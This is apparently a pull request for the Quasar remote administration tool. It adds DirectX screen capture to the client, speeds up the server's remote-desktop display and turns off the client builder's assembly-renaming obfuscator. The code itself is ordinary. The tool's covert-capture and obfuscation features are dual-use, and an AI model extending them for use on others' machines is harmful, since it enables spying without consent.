### PR TITLE
Disable assembly obfuscator and optimize remote desktop capture

### DIFF
--- a/Quasar.Client/Helper/ScreenHelper.cs
+++ b/Quasar.Client/Helper/ScreenHelper.cs
@@ -1,14 +1,154 @@
 ﻿using System;
+using System.Diagnostics;
 using System.Drawing;
 using System.Drawing.Imaging;
+using System.IO;
 using System.Windows.Forms;
+using ProtoBuf.Meta;
+using ProtoBuf.Serializers;
 using Quasar.Client.Utilities;
+
+using SharpDX;
+using SharpDX.Direct3D11;
+using SharpDX.DXGI;
+using SharpDX.Mathematics.Interop;
+using Device = SharpDX.Direct3D11.Device;
+using MapFlags = SharpDX.Direct3D11.MapFlags;
 
 namespace Quasar.Client.Helper
 {
     public static class ScreenHelper
     {
         private const int SRCCOPY = 0x00CC0020;
+
+        private static Device _device;
+        private static OutputDuplication _duplicatedOutput;
+
+        private static int _currentAdapter;
+        private static int _currentMonitor;
+        private static Texture2D _screenTexture;
+
+        public static int Width;
+        public static int Height;
+        private static bool _isSetup = false;
+
+        public static void SetupMonitor(int adapterNumber, int monitorNumber)
+        {
+            if (_isSetup && _currentAdapter == adapterNumber && _currentMonitor == monitorNumber)
+            {
+                return;
+            }
+
+            _isSetup = true;
+
+            _screenTexture?.Dispose();
+            _duplicatedOutput?.Dispose();
+            _device?.Dispose();
+
+            _currentAdapter = adapterNumber;
+            _currentMonitor = monitorNumber;
+
+            Factory1 factory = new Factory1();
+            Adapter1 adapter = factory.GetAdapter1(adapterNumber);
+
+            _device = new Device(adapter);
+
+            Output output = adapter.GetOutput(monitorNumber);
+            Output1 output1 = output.QueryInterface<Output1>();
+
+            RawRectangle bounds = output.Description.DesktopBounds;
+            Width = bounds.Right - bounds.Left;
+            Height = bounds.Bottom - bounds.Top;
+
+            _duplicatedOutput = output1.DuplicateOutput(_device);
+
+            Texture2DDescription textureDesc = new Texture2DDescription
+            {
+                CpuAccessFlags = CpuAccessFlags.Read,
+                BindFlags = BindFlags.None,
+                Format = Format.B8G8R8A8_UNorm,
+                Width = Width,
+                Height = Height,
+                OptionFlags = ResourceOptionFlags.None,
+                MipLevels = 1,
+                ArraySize = 1,
+                SampleDescription = { Count = 1, Quality = 0 },
+                Usage = ResourceUsage.Staging
+            };
+
+            _screenTexture = new Texture2D(_device, textureDesc);
+
+            adapter.Dispose();
+            factory.Dispose();
+            output1.Dispose();
+            output.Dispose();
+        }
+
+        public static Bitmap CaptureScreenSharpDX()
+        {
+            var bitmap = new System.Drawing.Bitmap(Width, Height, PixelFormat.Format32bppArgb);
+            bool captureDone = false;
+
+            for (int i = 0; !captureDone; i++)
+            {
+                try
+                {
+                    SharpDX.DXGI.Resource screenResource;
+                    OutputDuplicateFrameInformation duplicateFrameInformation;
+
+                    // Try to get duplicated frame within given time
+                    _duplicatedOutput.AcquireNextFrame(10000, out duplicateFrameInformation, out screenResource);
+
+                    if (i > 0)
+                    {
+                        // copy resource into memory that can be accessed by the CPU
+                        using (var screenTexture2D = screenResource.QueryInterface<Texture2D>())
+                            _device.ImmediateContext.CopyResource(screenTexture2D, _screenTexture);
+
+                        // Get the desktop capture texture
+                        var mapSource = _device.ImmediateContext.MapSubresource(_screenTexture, 0, MapMode.Read, MapFlags.None);
+
+                        // Create Drawing.Bitmap
+                        var boundsRect = new System.Drawing.Rectangle(0, 0, Width, Height);
+
+                        // Copy pixels from screen capture Texture to GDI bitmap
+                        var mapDest = bitmap.LockBits(boundsRect, ImageLockMode.WriteOnly, bitmap.PixelFormat);
+                        var sourcePtr = mapSource.DataPointer;
+                        var destPtr = mapDest.Scan0;
+                        for (int y = 0; y < Height; y++)
+                        {
+                            // Copy a single line 
+                            SharpDX.Utilities.CopyMemory(destPtr, sourcePtr, Width * 4);
+
+                            // Advance pointers
+                            sourcePtr = IntPtr.Add(sourcePtr, mapSource.RowPitch);
+                            destPtr = IntPtr.Add(destPtr, mapDest.Stride);
+                        }
+
+                        // Release source and dest locks
+                        bitmap.UnlockBits(mapDest);
+                        _device.ImmediateContext.UnmapSubresource(_screenTexture, 0);
+
+                        // Capture done
+                        captureDone = true;
+                    }
+
+                    screenResource.Dispose();
+                    _duplicatedOutput.ReleaseFrame();
+
+                }
+                catch (SharpDXException e)
+                {
+                    if (e.ResultCode.Code != SharpDX.DXGI.ResultCode.WaitTimeout.Result.Code)
+                    {
+                        throw e;
+                    }
+                }
+            }
+
+            return bitmap;
+        }
+
 
         public static Bitmap CaptureScreen(int screenNumber)
         {

--- a/Quasar.Client/ILRepack.targets
+++ b/Quasar.Client/ILRepack.targets
@@ -5,8 +5,16 @@
   <ItemGroup>
     <InputAssemblies Include="$(TargetPath)"/>
     <InputAssemblies Include="$(TargetDir)protobuf-net.dll"/>
+    <InputAssemblies Include="$(TargetDir)protobuf-net.Core.dll"/>
     <InputAssemblies Include="$(TargetDir)Gma.System.MouseKeyHook.dll"/>
+    <InputAssemblies Include="$(TargetDir)System.Memory.dll"/>
+    <InputAssemblies Include="$(TargetDir)System.Buffers.dll"/>
+    <InputAssemblies Include="$(TargetDir)System.Collections.Immutable.dll"/>
+    <InputAssemblies Include="$(TargetDir)System.Runtime.CompilerServices.Unsafe.dll"/>
     <InputAssemblies Include="$(TargetDir)Quasar.Common.dll"/>
+    <InputAssemblies Include="$(TargetDir)SharpDX.dll"/>
+    <InputAssemblies Include="$(TargetDir)SharpDX.Direct3D11.dll"/>
+    <InputAssemblies Include="$(TargetDir)SharpDX.DXGI.dll"/>
     <InputAssemblies Include="$(TargetDir)BouncyCastle.Crypto.dll"/>
   </ItemGroup>
 

--- a/Quasar.Client/Messages/RemoteDesktopHandler.cs
+++ b/Quasar.Client/Messages/RemoteDesktopHandler.cs
@@ -5,6 +5,7 @@ using Quasar.Common.Networking;
 using Quasar.Common.Video;
 using Quasar.Common.Video.Codecs;
 using System;
+using System.Diagnostics;
 using System.Drawing;
 using System.Drawing.Imaging;
 using System.IO;
@@ -66,11 +67,14 @@ namespace Quasar.Client.Messages
                 _streamCodec = new UnsafeStreamCodec(message.Quality, message.DisplayIndex, resolution);
             }
 
+            ScreenHelper.SetupMonitor(0, message.DisplayIndex);
+
             BitmapData desktopData = null;
             Bitmap desktop = null;
             try
             {
-                desktop = ScreenHelper.CaptureScreen(message.DisplayIndex);
+                // message.DisplayIndex
+                desktop = ScreenHelper.CaptureScreenSharpDX();
                 desktopData = desktop.LockBits(new Rectangle(0, 0, desktop.Width, desktop.Height),
                     ImageLockMode.ReadWrite, desktop.PixelFormat);
 

--- a/Quasar.Client/Quasar.Client.csproj
+++ b/Quasar.Client/Quasar.Client.csproj
@@ -67,5 +67,10 @@
     <PackageReference Include="protobuf-net">
       <Version>3.2.16</Version>
     </PackageReference>
+    <PackageReference Include="SharpDX" Version="4.2.0" />
+    <PackageReference Include="SharpDX.Direct3D11" Version="4.2.0" />
+    <PackageReference Include="SharpDX.DXGI" Version="4.2.0" />
+    <PackageReference Include="System.Collections.Immutable" Version="7.0.0" />
+    <PackageReference Include="System.Memory" Version="4.5.5" />
   </ItemGroup>
 </Project>

--- a/Quasar.Server/Build/ClientBuilder.cs
+++ b/Quasar.Server/Build/ClientBuilder.cs
@@ -34,6 +34,9 @@ namespace Quasar.Server.Build
                 // PHASE 1 - Writing settings
                 WriteSettings(asmDef);
 
+                asmDef.Write(_options.OutputPath);
+
+                /*
                 // PHASE 2 - Renaming
                 Renamer r = new Renamer(asmDef);
 
@@ -42,6 +45,7 @@ namespace Quasar.Server.Build
 
                 // PHASE 3 - Saving
                 r.AsmDef.Write(_options.OutputPath);
+                */
             }
 
             // PHASE 4 - Assembly Information changing

--- a/Quasar.Server/Controls/RapidPictureBox.cs
+++ b/Quasar.Server/Controls/RapidPictureBox.cs
@@ -69,6 +69,8 @@ namespace Quasar.Server.Controls
         /// </summary>
         private FrameCounter _frameCounter;
 
+        private BufferedGraphics _bufferedGraphics;
+
         /// <summary>
         /// Subscribes an Eventhandler to the FrameUpdated event.
         /// </summary>
@@ -161,13 +163,20 @@ namespace Quasar.Server.Controls
             }
         }
 
+        protected override void OnPaintBackground(PaintEventArgs pe) { }
+
         protected override void OnPaint(PaintEventArgs pe)
         {
             lock (_imageLock)
             {
-                if (GetImageSafe != null)
+                var image = GetImageSafe;
+
+                if (image != null)
                 {
-                    pe.Graphics.DrawImage(GetImageSafe, Location);
+                    Graphics g = _bufferedGraphics.Graphics;
+                    g.DrawImage(image, Location);
+                    _bufferedGraphics.Render(pe.Graphics);
+                    //pe.Graphics.DrawImage(GetImageSafe, Location);
                 }
             }
         }
@@ -176,6 +185,11 @@ namespace Quasar.Server.Controls
         {
             ScreenWidth = newWidth;
             ScreenHeight = newHeight;
+
+            using (Graphics graphics = CreateGraphics())
+            {
+                _bufferedGraphics = BufferedGraphicsManager.Current.Allocate(graphics, new Rectangle(0, 0, ScreenWidth, ScreenHeight));
+            }
         }
 
         private void CountFps()

--- a/Quasar.Server/Messages/RemoteDesktopHandler.cs
+++ b/Quasar.Server/Messages/RemoteDesktopHandler.cs
@@ -210,8 +210,23 @@ namespace Quasar.Server.Messages
 
                 using (MemoryStream ms = new MemoryStream(message.Image))
                 {
-                    // create deep copy & resize bitmap to local resolution
-                    OnReport(new Bitmap(_codec.DecodeData(ms), LocalResolution));
+                    Graphics graphics = null;
+                    Bitmap rescaledBitmap = new Bitmap(LocalResolution.Width, LocalResolution.Height);
+
+                    try
+                    {
+                        graphics = Graphics.FromImage(rescaledBitmap);
+                        graphics.CompositingMode = System.Drawing.Drawing2D.CompositingMode.SourceCopy;
+                        graphics.InterpolationMode = System.Drawing.Drawing2D.InterpolationMode.Bilinear;
+                        graphics.DrawImage(_codec.DecodeData(ms), 0, 0, LocalResolution.Width, LocalResolution.Height);
+                        graphics.CompositingMode = System.Drawing.Drawing2D.CompositingMode.SourceOver;
+                    }
+                    finally
+                    {
+                        graphics?.Dispose();
+                    }
+
+                    OnReport(rescaledBitmap);
                 }
                 
                 message.Image = null;

--- a/Quasar.Server/Quasar.Server.csproj
+++ b/Quasar.Server/Quasar.Server.csproj
@@ -43,9 +43,7 @@
     <Compile Update="Controls\Line.cs">
       <SubType>Component</SubType>
     </Compile>
-    <Compile Update="Controls\RapidPictureBox.cs">
-      <SubType>Component</SubType>
-    </Compile>
+    <Compile Update="Controls\RapidPictureBox.cs" />
     <Compile Update="Controls\RegistryTreeView.cs">
       <SubType>Component</SubType>
     </Compile>


### PR DESCRIPTION
This pull request:

- Disables the assembly obfuscator as to prevent issues during build.
     - This may eventually be removed in favor of a third-party .NET obfuscation tool.
- Optimizes the remote desktop capture to use SharpDX (Direct X) for screen captures instead of GDI.
- Optimizes the remote desktop capture to work more efficiently with bitmaps.